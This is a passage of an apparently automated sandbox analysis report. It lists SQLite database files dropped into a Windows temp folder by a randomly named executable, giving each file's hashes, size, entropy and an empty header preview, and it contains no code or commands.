                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\s3rECp1tL8

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\sAvZqqmXBL

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tCmc5lkfzK

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tb4SSMHMeL

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\u3cuOmH7s3

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\uFn3e3ONBg

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ulZeBq2CdZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\upiCuXm42p

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\vPEBK0TO3a

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\vfQnLr71wp

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\vnvXZSa65L

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\vvVvY2IDO9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\w6GAlImk8G

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wAPjLrNtOu

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wDQmaD3117

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wGE9uGg0yF

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wrJBaFl6ap

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wvMQcgggLh

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\x5n0wSdGjB

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xKVCKpaLMA

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xb5DnYyn9a

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xjg8Y2m7ou

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xwZ2RtKjNY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
